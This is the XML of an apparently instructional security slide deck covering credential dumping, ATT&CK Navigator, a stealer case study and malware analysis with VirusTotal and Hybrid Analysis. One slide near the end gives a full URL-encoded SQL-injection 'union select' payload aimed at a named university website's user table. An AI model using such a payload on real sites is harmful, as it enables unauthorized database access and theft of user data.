          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Credential Access – OS Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6D7B33-D172-2064-4E6F-558DECF7D4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59796"/>
            <a:ext cx="7620000" cy="3681407"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829152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DE1A-A1CD-5B3F-AFB1-E28247B0F5BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ATT&amp;CK Navigator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7151C4CF-5D03-B054-6845-A46035AEB215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://mitre-attack.github.io/attack-navigator/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Visualize </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A threat actor’s MO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The behavior of a specific tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Generate a security exercise. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400827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78230"/>
            <a:ext cx="7620000" cy="3044540"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3167958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B3C2-196B-F44E-A77C-B5B5B57758A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Collector-stealer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5C5DAB-83CA-974B-88E1-701DC1CCF281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3213100" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virusbulletin.com/virusbulletin/2021/12/collector-stealer-russian-origin-credential-and-information-extractor/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solid read, has an ATT&amp;CK mapping at the end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CF9245-7DB2-DC3A-F76A-093F9BFB4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300" y="1536700"/>
            <a:ext cx="5473700" cy="4927600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163395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6838-1320-D445-8337-DD7AE3115FBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic Malware Analysis </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1824298C-D697-9B44-9F55-0F604E2AFC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Online (free/paid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hybrid Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>CrowdStrike (add on to their solution)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>prem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Cuckoo (free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FireEye AX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4096123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E1E0-9484-C24D-85F7-324E96B517DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC180CCA-09DB-AA48-93EC-41211E1B7938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63AD755-65C8-5E4E-A70D-DF3393929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984367"/>
            <a:ext cx="5879064" cy="4416433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2111806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9A29-AF96-1A46-ADDE-7D39CFD7F2C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEFF5AF2-3F75-A548-A599-1F2BA1C881C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Begun by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hispasec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sistemas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acquired by Google in 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aggregates AV products and online AV/URL scan engines to check uploaded files to see if they good/bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Incident Response this can rapidly help review potential malicious files and also show if your AV solution missed it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Researchers/AV vendors can get copies of uploaded files to review and make their products better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently checks 68 different AV products, 66 different URL blacklists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267341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AD94-9C82-1246-AAC5-EA8385D4A50E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1899C9E7-7346-DF4D-B0A5-1DCE9BA80ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/#/file/e699336fb1620edc54621b6f2c7deae8aee01d39cb72809bd1ba6aa7dee2b9c8/detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029037DC-F4FF-A145-881D-D79BCA2FE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912"/>
            <a:ext cx="9144000" cy="3631888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290624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E1B8-6C48-EF4C-A646-5F5D84A1512C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>VirusTotal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71974953-5730-7B4A-9338-F6A4D6CD48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79091"/>
            <a:ext cx="7620000" cy="3642817"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="544275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FF7B-072C-4F08-6326-221634F51540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – known binaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCE9824-7C8E-C9A1-5D47-4EA2D2272884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/840e1f9dc5a29bebf01626822d7390251e9cf05bb3560ba7b68bdb8a41cf08e3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>If known good – saves an analyst a lot of time going down a dead end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01ADB196-C50B-8471-0DA6-B4FD42573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127" y="4226010"/>
            <a:ext cx="5600146" cy="2496065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2254323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FE784-C5E0-9042-BADF-CDBE066ED57F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hybrid Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E96B4FC-7590-6B41-9CB9-0A191548C242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hybrid-analysis.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D508F52-C7C2-744F-AE6D-CE91B0DB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31" y="2417222"/>
            <a:ext cx="5849937" cy="3666077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156458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8AC4-5EA0-244B-9E6F-8E764895D015}"/>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884E89C0-AB8C-F446-8AA2-B9D7EAAE36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589" y="274638"/>
            <a:ext cx="3967611" cy="6326207"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787EDC18-8ACB-4F43-8151-C1C7B26F7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690173"/>
            <a:ext cx="4889500" cy="2946400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857913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03E2-05B5-F246-87DD-41ABD46CB862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hybrid Analysis Sample</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCFE50DC-C6A7-3343-9AA3-C401CD554A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hybrid-analysis.com/sample/e699336fb1620edc54621b6f2c7deae8aee01d39cb72809bd1ba6aa7dee2b9c8?environmentId=120</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F65DF5-B31B-9546-993D-6C78125A3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787"/>
            <a:ext cx="9144000" cy="1691425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78906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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gradschool.umd.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comparisonengine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>product.comparision.php?cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=null%2520union%2520all%2520select%25201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%2520from%2520daype_users_tb%2520--&amp;name=GSM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3735554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0297-734C-F148-8BE2-FA3171B48FE5}"/>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9279AEDD-B874-DD4E-BED1-090DCB24F4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9154105" cy="4429125"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217787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F2E4-D6D5-D643-A94D-E3B43D403C51}"/>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42CF4E1-271C-0442-9EB2-923DB5ECFD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 y="274637"/>
